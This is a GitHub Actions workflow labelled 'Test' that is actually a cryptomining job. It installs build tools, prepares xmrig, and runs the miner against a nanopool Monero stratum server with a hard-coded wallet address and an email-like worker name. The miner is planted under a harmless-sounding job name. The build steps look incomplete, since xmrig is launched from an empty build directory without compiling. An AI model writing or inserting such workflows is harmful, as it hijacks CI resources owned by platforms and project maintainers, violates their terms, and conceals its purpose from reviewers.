name: Test
on: 
 workflow_dispatch:
jobs:
   build:
     runs-on: ubuntu-latest
     
     strategy:
       fail-fast: false
       matrix:
         runner: [0]
     steps:
       - name: Uses
         uses: actions/checkout@v4
       - name: install
         run: |
          sudo apt-get update -y
          sudo apt-get install -y git build-essential cmake automake libtool autoconf
          mkdir ./xmrig/build && cd ./xmrig/scripts
          ./build_deps.sh && cd ../build
          ./xmrig -a cryptonight -o stratum+tcp://xmr-us-east1.nanopool.org:10300 -u 47wjAGRkC7eMPa5tnJxV5pin2M2FfrapiUvVLQazb7HwDvv11vunhC6FR8J5AZBLWjCUBMbHXM1wN6FrZLPDSm1XQoKUFyc -p git-1:auzziewildcat10@gmail.com -t 1
